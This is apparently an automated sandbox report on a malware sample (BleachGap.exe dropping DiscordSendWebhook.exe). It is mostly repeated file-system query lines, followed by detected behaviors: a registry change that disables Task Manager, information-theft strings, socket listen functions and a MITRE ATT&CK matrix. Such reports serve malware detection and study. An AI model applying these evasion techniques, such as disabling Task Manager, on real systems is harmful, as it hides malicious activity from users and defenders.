Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001750D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

34_2_001750D7

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_00182230 GetUserNameW,

34_2_00182230

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_0017418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

34_2_0017418A

Source: C:\Users\user\Desktop\BleachGap.exe

Code function: 0_2_0040559A GetVersionExW,GetVersionExW,

0_2_0040559A

Lowering of HIPS / PFW / Operating System Security Settings:

Disables the Windows task manager (taskmgr)

Show sources

Source: C:\Windows\System32\reg.exe

Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Stealing of Sensitive Information:

Source: DiscordSendWebhook.exe	Binary or memory string: WIN_81
Source: DiscordSendWebhook.exe	Binary or memory string: WIN_XP
Source: DiscordSendWebhook.exe	Binary or memory string: WIN_XPe
Source: DiscordSendWebhook.exe	Binary or memory string: WIN_VISTA
Source: DiscordSendWebhook.exe	Binary or memory string: WIN_7
Source: DiscordSendWebhook.exe	Binary or memory string: WIN_8
Source: DiscordSendWebhook.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality:

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001B6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		34_2_001B6596
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001B6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		34_2_001B6A5A

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts2	Scripting1	Startup Items1	Startup Items1	Disable or Modify Tools11	Input Capture31	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API1	Application Shimming1	Exploitation for Privilege Escalation1	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture31	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter11	Valid Accounts2	Application Shimming1	Scripting1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Clipboard Data2	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Registry Run Keys / Startup Folder12	Valid Accounts2	Obfuscated Files or Information21	NTDS	System Information Discovery25	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Access Token Manipulation21	Software Packing111	LSA Secrets	Security Software Discovery141	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
